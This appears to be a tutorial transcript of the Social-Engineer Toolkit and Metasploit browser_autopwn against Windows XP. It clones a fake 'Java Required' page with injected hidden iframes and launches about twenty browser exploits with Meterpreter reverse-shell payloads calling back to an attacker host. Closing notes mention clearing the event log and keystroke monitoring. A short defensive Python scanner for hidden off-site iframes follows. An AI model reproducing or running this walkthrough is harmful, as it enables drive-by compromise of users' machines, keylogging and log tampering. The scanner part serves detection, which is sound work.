Web-page intrusion (applies to Windows XP; read for the approach only)

[email protected]:~# setoolkit

Do you agree to the terms of service [y/n]: y

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> 1

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.

set> 2

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu

set:webattack> 2

1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

set:webattack> 1

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no

[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection: 192.168.1.117  (kali)

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack> Select a template: 1

Enter the browser exploit you would like to use [8]:

1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9) Java Applet JMX Remote Code Execution (2013-01-10)
10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12) Java 7 Applet Remote Code Execution (2012-08-26)
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18) Adobe Flash Player Object Type Confusion (2012-05-04)
19) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
25) Internet Explorer CSS Import Use After Free (2010-11-29)
26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35) Microsoft Help Center XSS and Command Execution (2010-06-09)
36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads> 46

1) Windows Shell Reverse_TCP              Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter        Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL            Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64          Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64    Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster      Spawn a meterpreter shell and find a port home via multiple ports
7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter
8) Windows Meterpreter Reverse DNS        Use a hostname instead of an IP address and use Reverse Meterpreter
9) Download/Run your Own Executable       Downloads an executable and runs it

set:payloads> 2

set:payloads> Port to use for the reverse [443]: 443     (this step takes a while to run)

[*] Cloning the website:
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Apache appears to be running, moving files into Apache's home

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...


=[ metasploit v4.12.23-dev                        ]
+ -- --=[ 1577 exploits - 907 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use auxiliary/server/browser_autopwn
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.1.117
LHOST => 192.168.1.117
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set//meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Auxiliary module running as background job
[*] Setup
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.1.117...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XJyavBIacR
[*] Local IP: http://192.168.1.117:8080/XJyavBIacR
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QGlDpPXcx
[*] Local IP: http://192.168.1.117:8080/QGlDpPXcx
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ARlpIFLe
[*] Local IP: http://192.168.1.117:8080/ARlpIFLe
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SOOmPaKWujh
[*] Local IP: http://192.168.1.117:8080/SOOmPaKWujh
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/xGsBkydiyDEQ
[*] Local IP: http://192.168.1.117:8080/xGsBkydiyDEQ
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/WtYy
[*] Local IP: http://192.168.1.117:8080/WtYy
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YRcEw
[*] Local IP: http://192.168.1.117:8080/YRcEw
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XTCiGPcUSrL
[*] Local IP: http://192.168.1.117:8080/XTCiGPcUSrL
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bzfzBWGZjB
[*] Local IP: http://192.168.1.117:8080/bzfzBWGZjB
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/akFIwW
[*] Local IP: http://192.168.1.117:8080/akFIwW
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jFdeDrFt
[*] Local IP: http://192.168.1.117:8080/jFdeDrFt
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ajEThoWib
[*] Local IP: http://192.168.1.117:8080/ajEThoWib
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/oeredhZHxbFn
[*] Local IP: http://192.168.1.117:8080/oeredhZHxbFn
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/TIMDwI
[*] Local IP: http://192.168.1.117:8080/TIMDwI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JjYZ
[*] Local IP: http://192.168.1.117:8080/JjYZ
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/sUtiNZGyAVn
[*] Local IP: http://192.168.1.117:8080/sUtiNZGyAVn
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kpaPwyqlTXpvM
[*] Local IP: http://192.168.1.117:8080/kpaPwyqlTXpvM
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/skqCsHFX
[*] Local IP: http://192.168.1.117:8080/skqCsHFX
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vUMSlRJDHh
[*] Local IP: http://192.168.1.117:8080/vUMSlRJDHh
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/DTsZvlBS
[*] Local IP: http://192.168.1.117:8080/DTsZvlBS
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.1.117:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.1.117:6666
[*] Started reverse TCP handler on 192.168.1.117:7777
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] --- Done, found 20 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.117:8080/
[*] Server started.               (the server is now running) (press Enter)

The client then visits http://192.168.1.117:8080/

Clear the Windows event log

Remote keystroke monitoring

exit -y          exits all services.
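The step the transcript labels "Injecting iframes into cloned website for MSF Attack" is what a defender can look for on the wire or in a web proxy: a cloned page whose only difference from the original is a zero-sized or hidden frame pulling content from another host on an odd port (8080 above). The following scanner is an added example, not SET's or Metasploit's code; the sample page and its markup are constructed for illustration and are not SET's actual template.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a cloned "Java Required" page carrying a hidden iframe that
# points at the exploit server from the transcript. Assumed markup, not SET's template.
SAMPLE_PAGE = """<html><body><h1>Java Required</h1>
<p>Please install Java to continue.</p>
<iframe src="http://192.168.1.117:8080/" width="0" height="0" frameborder="0"></iframe>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

STANDARD_PORTS = {"http": 80, "https": 443}

class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def is_hidden(attrs):
    """Zero-sized or CSS-hidden frames are the classic drive-by indicator."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return any(attrs.get(d, "").strip() in ("0", "0px") for d in ("width", "height"))

def find_suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for frames worth investigating; page_host is
    the hostname the page was served from (used to spot off-site frames)."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        url = urlparse(src)
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden")
        if url.hostname and url.hostname != page_host:
            reasons.append("off-site")
        if url.port and url.port != STANDARD_PORTS.get(url.scheme):
            reasons.append("non-standard-port")
        # Report hidden frames anywhere, or visible off-site frames on odd ports
        if "hidden" in reasons or {"off-site", "non-standard-port"} <= set(reasons):
            findings.append((src, reasons))
    return findings
```

Run against a page fetched through a proxy with `find_suspicious_iframes(body, served_host)`; an ordinary visible embed on a standard port is left alone, while the injected frame comes back with all three reasons.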

Time: 2024-10-28 23:40:49
